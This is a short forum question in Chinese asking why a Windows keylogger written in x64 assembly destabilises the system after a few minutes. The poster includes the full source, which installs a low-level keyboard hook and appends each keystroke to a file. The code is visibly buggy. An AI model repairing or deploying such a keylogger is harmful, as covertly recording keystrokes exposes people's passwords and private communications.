我制作了一个使用SetWindowsHookEx API的Windows键盘记录程序。我的键盘记录程序在运行的第一分钟运行良好,但是5分钟后,win-64 OS开始无法正常工作。这是我的消息来源:
start:
invoke SetWindowsHookEx, WH_KEYBOARD_LL, LowLevelKeyboardProc, 0, 0
mov [hhook], rax
messageproc:
invoke GetMessage, msg, NULL, 0, 0
cmp rax, TRUE
jz processmsg
invoke UnhookWindowsHookEx, [hhook]
invoke ExitProcess, 0
processmsg:
invoke TranslateMessage, msg
invoke DispatchMessage, msg
jmp messageproc
proc LowLevelKeyboardProc
ss
cmp rcx, 00h
jae processhook
return:
mov rcx,0
call [CallNextHookEx]
sub rsp,8
retn
processhook:
cmp rdx, WM_KEYDOWN
jnz return2
mov rbx,r8
mov rbx,qword [rbx+4h]
mov [buffer],bl
invoke fopen, filename, filemode
mov [fp],rax
invoke fwrite, buffer, 1, 1, [fp]
invoke fclose,[fp]
return2:
ret
endp